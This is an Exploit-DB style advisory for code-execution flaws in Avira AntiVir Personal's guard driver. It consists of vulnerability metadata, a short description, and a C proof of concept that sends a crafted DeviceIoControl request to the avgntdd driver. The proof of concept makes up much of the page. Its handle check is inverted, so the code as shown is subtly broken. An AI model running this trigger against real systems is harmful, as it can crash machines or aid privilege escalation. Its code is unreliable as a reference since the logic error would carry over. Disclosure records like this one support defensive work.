Avira AntiVir Personal Multiple Code-Execution Vulnerabilities

vendor:

Avira AntiVir Personal

by:

SecurityFocus

7.8

CVSS

HIGH

Code-Execution

CWE

Product Name: Avira AntiVir Personal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2012

Avira AntiVir Personal Multiple Code-Execution Vulnerabilities

Avira AntiVir Personal is prone to multiple code-execution vulnerabilities. Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.

Mitigation:

Upgrade to the latest version of Avira AntiVir Personal.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/45807/info

Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.

Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.

Please note that these issues affect versions of the application that are no longer supported. 

#include <windows.h>

int main(int argc, char* argv[])
{
	char buffer[0x100];
	DWORD returned;
	HANDLE hDevice;

	hDevice = CreateFileW( L"\\\\.\\avgntdd", GENERIC_READ | GENERIC_WRITE, 0, 0, 3, 0x80, 0 );
	if( hDevice != INVALID_HANDLE_VALUE )
	{
		printf("Could not open handle to guard driver.\n");
		return 1;
	}
	
	memset( buffer, 0, sizeof(buffer) );
	
	if( !DeviceIoControl( hDevice, 0x0CABA020C, &buffer, sizeof(buffer), 0,0, &returned, 0) )
	{
		printf("Could not communicate with guard driver.\n");
		return 1;		
	}
	return 0;
}